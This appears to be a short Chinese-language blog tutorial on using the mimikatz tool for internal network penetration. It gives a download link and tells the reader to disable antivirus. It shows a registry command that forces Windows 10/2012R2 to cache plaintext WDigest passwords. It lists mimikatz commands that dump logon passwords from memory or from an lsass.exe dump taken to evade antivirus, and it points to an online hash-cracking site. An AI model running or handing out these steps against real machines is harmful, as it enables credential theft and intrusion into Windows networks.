内网渗透神器mimikatz

• 下载地址

https://github.com/ParrotSec/mimikatz

• 注意：
• 1.使用mimikatz需关闭杀毒软件
• 2.当目标为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文。需输入一下命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

• 如果失败请以管理员身份运行cmd或
• 启动mimikatz(win7操作系统)

mimikatz.exe//我是在源文件目录下运行的cmd,如果你没有在原目录下运行请注意路径

• 抓取文明密码
• 在windows2012以上的系统不能直接获取明文密码了，当可以搭配procdump+mimikatz获取密码。

mimikatz # log
mimikatz # privilege::debug    //提升权限
mimikatz # sekurlsa::logonpasswords

• 不上传mimikatz，这样不用解决杀毒软件拦截的问题，直接导出lsass.exe的dump文件

• 并上传到自己的电脑，本地使用mimikatz进行分析

• 首先在任务管理器的进程中找到lass.exe右击选择创建转储文件,注意文件生成目录

Mimikatz.exe
sekurlsa::minidump D:\lsass.DMP
sekurlsa::logonpasswords

•  win10抓取文明密码,以管理员身份运行,和上述方法相同,若未显示则已修复漏洞

mimikatz.exe
privilege::debug
sekurlsa::logonPasswords

• 解密网站

https://www.cmd5.com/